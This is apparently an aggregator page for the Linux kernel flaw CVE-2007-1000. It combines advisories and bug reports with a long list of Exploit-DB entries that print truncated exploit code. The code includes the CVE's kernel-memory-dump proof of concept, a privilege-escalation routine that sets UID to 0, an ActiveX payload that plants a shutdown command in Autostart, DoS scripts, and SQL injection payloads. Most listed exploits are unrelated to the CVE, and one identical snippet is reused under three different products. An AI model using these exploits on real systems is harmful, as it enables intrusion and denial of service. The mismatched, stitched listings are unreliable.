CVE-2007-1000
published 2007-03-12CVE-2007-1000: The ipv6_getsockopt_sticky function in net/ipv6/ipv6_sockglue.c in the Linux kernel before 2.6.20.2 allows local users to read arbitrary kernel memory via…
PriorityP429high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.10%
61.5th percentile
The ipv6_getsockopt_sticky function in net/ipv6/ipv6_sockglue.c in the Linux kernel before 2.6.20.2 allows local users to read arbitrary kernel memory via certain getsockopt calls that trigger a NULL dereference.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.20.1 | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_ubuntu7.8HIGH
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-07-19·CVSS 7.8
CVE-2006-4623 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
A flaw was discovered in dvb ULE decapsulation. A remote attacker could
send a specially crafted message and cause a denial of service.
(CVE-2006-4623)
The compat_sys_mount function allowed local users to cause a denial of
service when mounting a smbfs filesystem in compatibility mode.
(CVE-2006-7203)
The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of
buffers passed to read() and write(). A local attacker could exploit
this to execute arbitrary code with kernel privileges. (CVE-2007-0005)
Due to an variable handling flaw in the ipv6_getsockopt_sticky()
function a local attacker could exploit the getsockopt() calls to read
arbitrary kernel memory. This could disclose sensitive data.
(CVE-2007-1
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-07-18·CVSS 4.0
CVE-2007-2242 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
The compat_sys_mount function allowed local users to cause a denial of
service when mounting a smbfs filesystem in compatibility mode.
(CVE-2006-7203)
The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of
buffers passed to read() and write(). A local attacker could exploit
this to execute arbitrary code with kernel privileges. (CVE-2007-0005)
Due to a variable handling flaw in the ipv6_getsockopt_sticky()
function a local attacker could exploit the getsockopt() calls to
read arbitrary kernel memory. This could disclose sensitive data.
(CVE-2007-1000)
Ilja van Sprundel discovered that Bluetooth setsockopt calls could leak
kernel memory contents via an uninitialized stack buffer. A local
attacker c
Red Hat
security flaw
vendor_redhat·2007-03-06·CVSS 7.2
CVE-2007-1000 [HIGH] security flaw
security flaw
The ipv6_getsockopt_sticky function in net/ipv6/ipv6_sockglue.c in the Linux kernel before 2.6.20.2 allows local users to read arbitrary kernel memory via certain getsockopt calls that trigger a NULL dereference.
GHSA
GHSA-wq3f-4x5w-22pp: The ipv6_getsockopt_sticky function in net/ipv6/ipv6_sockglue
ghsa_unreviewed·2022-05-01
CVE-2007-1000 [HIGH] GHSA-wq3f-4x5w-22pp: The ipv6_getsockopt_sticky function in net/ipv6/ipv6_sockglue
The ipv6_getsockopt_sticky function in net/ipv6/ipv6_sockglue.c in the Linux kernel before 2.6.20.2 allows local users to read arbitrary kernel memory via certain getsockopt calls that trigger a NULL dereference.
No detection rules found.
Exploit-DB
WinUAE 1.4.4 - 'zfile.c' Stack Buffer Overflow
exploitdb·2007-12-21
CVE-2007-6537 WinUAE 1.4.4 - 'zfile.c' Stack Buffer Overflow
WinUAE 1.4.4 - 'zfile.c' Stack Buffer Overflow
---
// source: https://www.securityfocus.com/bid/26979/info
WinUAE is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
This issue affects versions prior to WinUAE 1.4.5.
/*
by Luigi Auriemma
*/
#include
#include
#include
#define VER "0.1"
#define BOFSZ 10000 // 1000 + 8192 + the rest
#define BUFFSZ (BOFSZ + 32)
#define u8 unsigned char
int putsc(u8 *data, int chr, int len);
int putxx(u8 *data, unsigned num, int bits);
void std_err(
Exploit-DB
id Software Doom 3 Engine - Console String Visualization Format String
exploitdb·2007-10-02
CVE-2007-5248 id Software Doom 3 Engine - Console String Visualization Format String
id Software Doom 3 Engine - Console String Visualization Format String
---
// source: https://www.securityfocus.com/bid/25893/info
id Software Doom 3 engine is prone to a format-string vulnerability.
Exploiting this issue will allow attackers to execute arbitrary code with the permissions of a user running the application. Failed attacks will likely cause denial-of-service conditions.
Several games that use the Doom 3 engine are affected, including Doom 3, Quake 4, and Prey.
/*
by Luigi Auriemma
*/
#include
#include
#include
#include
#include
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include
#include
#include
#include
#include
#include
#define ONESEC 1
#define stristr strcasestr
#endif
typedef uint8_t u8;
Exploit-DB
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation
exploitdb·2007-09-27
CVE-2007-4573 Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation
---
/*
* exploit for x86_64 linux kernel ia32syscall emulation
* bug, discovered by Wojciech Purczynski
*
* by
* Robert Swiecki
* Przemyslaw Frasunek
* Pawel Pisarczyk
* of ATM-Lab http://www.atm-lab.pl
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
uint32_t uid, euid, suid;
static void kernelmodecode(void)
{
int i;
uint8_t *gs;
uint32_t *ptr;
asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs));
for (i = 200; i < 1000; i+=1) {
ptr = (uint32_t*) (gs + i);
if ((ptr[0] == uid) && (ptr[1] == euid)
&& (ptr[2] == suid) && (ptr[3] == uid)) {
ptr[0] = 0; //UID
ptr[1] = 0; //EUID
ptr[2] = 0; //SUID
break;
}
}
}
static void docall(uint64_t *ptr, uint64_t size)
{
getresuid(&uid, &eu
Exploit-DB
Zoidcom 0.6.x - Malformed Packet Denial of Service
exploitdb·2007-08-14
CVE-2007-4358 Zoidcom 0.6.x - Malformed Packet Denial of Service
Zoidcom 0.6.x - Malformed Packet Denial of Service
---
// source: https://www.securityfocus.com/bid/25326/info
The Zoidcom network library is prone to a denial of service vulnerability when handling malformed packets.
An attacker could exploit this to crash a network service that is implemented with the library.
/*
by Luigi Auriemma
*/
#include
#include
#include
#include
#include
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include
#include
#include
#include
#include
#include
#define ONESEC 1
#define stristr strcasestr
#endif
#define VER "0.1"
#define PORT 8899
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
u32 resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
s
Exploit-DB
Live for Speed S1/S2/Demo - '.ply' Local Buffer Overflow
exploitdb·2007-08-06
CVE-2007-4257 Live for Speed S1/S2/Demo - '.ply' Local Buffer Overflow
Live for Speed S1/S2/Demo - '.ply' Local Buffer Overflow
---
/**
0day Live for speed patch x s2 /s1 and demo local .ply File buffer over flow
Live for speed .ply file is a set up file,This file is shared amongst user's
Who want stylish number plate's on there car's the buffer over flow happened with
An overly long number plate string inside the .ply file.So to exploit this issue
You have to get some one to put the .ply file inside there misc folder inside of
Lfs2,The buffer over flow happened when filling the number plate field with over
1000 byte's of buffer.Esp once again point's straight into our buffer/shellcode
This is the 3rd buffer over flow i have come across in lfs2,If your going to audit
An application do it properly and leave no stone unturned.This is a demonstration
Haw we ca
Exploit-DB
Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution
exploitdb·2007-07-27
CVE-2007-4062 Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution
Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution
---
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->
obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
# milw0rm.com [2007-07-27]
Exploit-DB
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
exploitdb·2007-07-18
CVE-2007-3764 Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
Asterisk
#include
#include
#include
#include
#include
#include
#include
#include
#define SKINNY_TCP_PORT 2000
#define CLEN 1024
#define SKINNY_MAX_SIZE 1000
#define REGISTER_MESSAGE 0x0001
struct register_message {
char name[16];
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type;
uint32_t maxStreams;
};
struct skinny_client {
int sd;
struct sockaddr_in saddr;
int active;
char rhost[CLEN];
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
struct skinny_client_message {
int len;
int res;
int e; /* 12 bytes */
char *data;
};
struct skinny_client *g_sc;
struct messages {
int e;
char *human;
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabil
Exploit-DB
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak
exploitdb·2007-07-10·CVSS 7.2
CVE-2007-1000 [HIGH] Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak
Linux Kernel
#include
#include
#include
#include
#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR 0xd0000000
unsigned int i;
int main(int argc, char *argv[]) {
int s;
unsigned int optlen;
void *ptr;
char value[10240];
char text[12];
fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
"dreyer '07 - free feels better\n"
"Dumping %p - %p to stdout\n",INIADDR,ENDADDR);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
/* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);
/* Make 0x00000000 address valid */
ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (ptr != NULL) {
perror("mmap");
exit(-1);
}
memset(ptr,0,4096);
/* Make ptr point to np->
Exploit-DB
BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service
exploitdb·2007-06-21
CVE-2007-3340 BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service
BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service
---
#!/usr/bin/perl
#GetOpt STD module
use IO::Socket;
use Getopt::Std;
getopts(":i:p:",\%args);
if(defined $args{i}){
$ip = $args{i};
}
if(defined $args{p}){
$port = $args{p};
}
if(!defined $args{i} or !defined $args{p}){
print "-----------------------------------------------------\n";
print "HTTP SERVER (httpsv1.6.2) 404 Denial of Services\n";
print "Site: http://httpsv.sourceforge.net/\n ";
print "Info: If u send to the server between 40-1000 requests\n";
print "to nonexisting pages the process will die.\n";
print "Found By Prili - imprili[at]gmail.com\n";
print "Usage: perl $0 -i -p \n";
print "Thanks to shinnai for the inspiration.\n";
print "-----------------------------------------------------\n";
exit;
}
Exploit-DB
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
exploitdb·2007-05-23
CVE-2007-2903 Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
---
2007/05/23
Microsoft Office 2000 Controllo UA di Microsoft Office (OUACTRL.OCX v. 1.0.1.9) "HelpPopup" method Remote Buffer Overflow
and winhlp32.exe Denial of Service (hey, don't you think this is a very long title :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
control is set as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Sub tryMe()
buff = String(1000, "a")
test.HelpPopup buff, "default"
End Sub
Registers content:
EAX 00000000
ECX 7E39EC0C USER32.7E39EC0C
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 38CFD2D0 OUACTRL.38CFD2D0
ESP 01D0F434 UNICODE "aaaa..."
EBP 00610061
ESI 02ACC86C
EDI 00000000
EIP 00610061
# milw0rm.com [2007-05-23]
Exploit-DB
DropAFew 0.2 - 'editlogcal.php?save Action calories' SQL Injection
exploitdb·2007-04-10
CVE-2007-1363 DropAFew 0.2 - 'editlogcal.php?save Action calories' SQL Injection
DropAFew 0.2 - 'editlogcal.php?save Action calories' SQL Injection
---
source: https://www.securityfocus.com/bid/23400/info
DropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
These issues affect DropAFew 0.2; prior versions may also be affected.
wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*'
http://[target]/calorie/editlogcal.php
Exploit-DB
AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection
exploitdb·2007-03-04
CVE-2007-1296 AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection
AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection
---
AJ Classifieds 1.0 (postingdetails.php) Remote BLIND SQL Injection Exploit
//'===============================================================================================
//'[Script Name: AJ Classifieds 1.0 (postingdetails.php) Remote BLIND SQL Injection Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[S.Page : http://www.ajsquare.com
//'[$$ : 250 USD - 1000 USD
//'[Using : Write Target after Submit Click
//'===============================================================================================
//# ajann,Turkey
//# ...
//Basic exploit,but any time : (
var path="/"
var adres="/postingdetails.php" //File name
var acik ="?cathead=community&postingid=" // Line x
var sql="-1%20union%20select%200,0
Exploit-DB
AJ Dating 1.0 - 'view_profile.php' SQL Injection
exploitdb·2007-03-04
CVE-2007-1297 AJ Dating 1.0 - 'view_profile.php' SQL Injection
AJ Dating 1.0 - 'view_profile.php' SQL Injection
---
AJDating 1.0 (view_profile.php) Remote BLIND SQL Injection Exploit
//'===============================================================================================
//'[Script Name: AJDating 1.0 (view_profile.php) Remote BLIND SQL Injection Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[S.Page : http://www.ajsquare.com
//'[$$ : 250 USD - 1000 USD
//'[Using : Write Target after Submit Click
//'===============================================================================================
//# ajann,Turkey
//# ...
//Basic exploit,but any time : (
var path="/"
var adres="/view_profile.php" //File name
var acik ="?user_id=" // Line x
var sql="-1%20union%20select%201,2,3,4,5,6,0,0,0,concat(char(117,115,101,114,11
Exploit-DB
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
exploitdb·2007-02-19
CVE-2007-1034 PHP-Nuke Module Emporium 2.3.0 - SQL Injection
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem
Exploit-DB
LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
exploitdb·2007-02-08
CVE-2007-0904 LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If
Exploit-DB
LushiWarPlaner 1.0 - 'register.php' SQL Injection
exploitdb·2007-02-08
CVE-2007-0864 LushiWarPlaner 1.0 - 'register.php' SQL Injection
LushiWarPlaner 1.0 - 'register.php' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If isl
Exploit-DB
LushiNews 1.01 - 'comments.php' SQL Injection
exploitdb·2007-02-08
CVE-2007-0865 LushiNews 1.01 - 'comments.php' SQL Injection
LushiNews 1.01 - 'comments.php' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem =
Bugzilla
CVE-2007-1000 security flaw
bugzilla·2018-08-16·CVSS 7.2
CVE-2007-1000 [HIGH] CVE-2007-1000 security flaw
CVE-2007-1000 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The ipv6_getsockopt_sticky function in net/ipv6/ipv6_sockglue.c in the Linux kernel before 2.6.20.2 allows local users to read arbitrary kernel memory via certain getsockopt calls that trigger a NULL dereference.
Bugzilla
CVE-2007-1000 NULL pointer hole in ipv6
bugzilla·2007-03-14·CVSS 7.2
CVE-2007-1000 [HIGH] CVE-2007-1000 NULL pointer hole in ipv6
CVE-2007-1000 NULL pointer hole in ipv6
There is a NULL pointer dereference which can lead to an arbitray kernel memory
leak, in the file net/ipv6/ipv6_sockglue.c :
340 case IPV6_2292PKTOPTIONS:
341 {
342 struct ipv6_txoptions *opt = NULL; [1]
343 struct msghdr msg;
344 struct flowi fl;
345 int junk;
346
347 fl.fl6_flowlabel = 0;
348 fl.oif = sk->sk_bound_dev_if;
349
340 if (optlen == 0)
341 goto update; [2]
377 update:
378 retv = 0;
379 if (inet_sk(sk)->is_icsk) {
380 if (opt) {
...
389 }
390 opt = xchg(&np->opt, opt); [3]
391 sk_dst_reset(sk);
392 } else {
393 write_lock(&sk->sk_dst_lock);
394 opt = xchg(&np->opt, opt); [4]
395 write_unlock(&sk->sk_dst_lock);
396 sk_dst_reset(sk);
397 }
819 case IPV6_DSTOPTS:
820 {
821
822 lock_sock(sk);
823 len = ipv6_getsockopt_sticky(sk, np->opt->
http://bugzilla.kernel.org/show_bug.cgi?id=8134http://fedoranews.org/cms/node/2787http://fedoranews.org/cms/node/2788http://lists.suse.com/archive/suse-security-announce/2007-May/0001.htmlhttp://secunia.com/advisories/24493http://secunia.com/advisories/24518http://secunia.com/advisories/24777http://secunia.com/advisories/24901http://secunia.com/advisories/25080http://secunia.com/advisories/25099http://secunia.com/advisories/25691http://secunia.com/advisories/26133http://secunia.com/advisories/26139http://www.kb.cert.org/vuls/id/920689http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.2http://www.mandriva.com/security/advisories?name=MDKSA-2007:078http://www.osvdb.org/33025http://www.redhat.com/support/errata/RHSA-2007-0169.htmlhttp://www.securityfocus.com/archive/1/471457http://www.securityfocus.com/bid/22904http://www.ubuntu.com/usn/usn-486-1http://www.ubuntu.com/usn/usn-489-1http://www.vupen.com/english/advisories/2007/0907http://www.wslabi.com/wabisabilabi/initPublishedBid.do?https://issues.rpath.com/browse/RPL-1153https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10015http://bugzilla.kernel.org/show_bug.cgi?id=8134http://fedoranews.org/cms/node/2787http://fedoranews.org/cms/node/2788http://lists.suse.com/archive/suse-security-announce/2007-May/0001.htmlhttp://secunia.com/advisories/24493http://secunia.com/advisories/24518http://secunia.com/advisories/24777http://secunia.com/advisories/24901http://secunia.com/advisories/25080http://secunia.com/advisories/25099http://secunia.com/advisories/25691http://secunia.com/advisories/26133http://secunia.com/advisories/26139http://www.kb.cert.org/vuls/id/920689http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.2http://www.mandriva.com/security/advisories?name=MDKSA-2007:078http://www.osvdb.org/33025http://www.redhat.com/support/errata/RHSA-2007-0169.htmlhttp://www.securityfocus.com/archive/1/471457http://www.securityfocus.com/bid/22904http://www.ubuntu.com/usn/usn-486-1http://www.ubuntu.com/usn/usn-489-1http://www.vupen.com/english/advisories/2007/0907http://www.wslabi.com/wabisabilabi/initPublishedBid.do?https://issues.rpath.com/browse/RPL-1153https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10015
2007-03-12
Published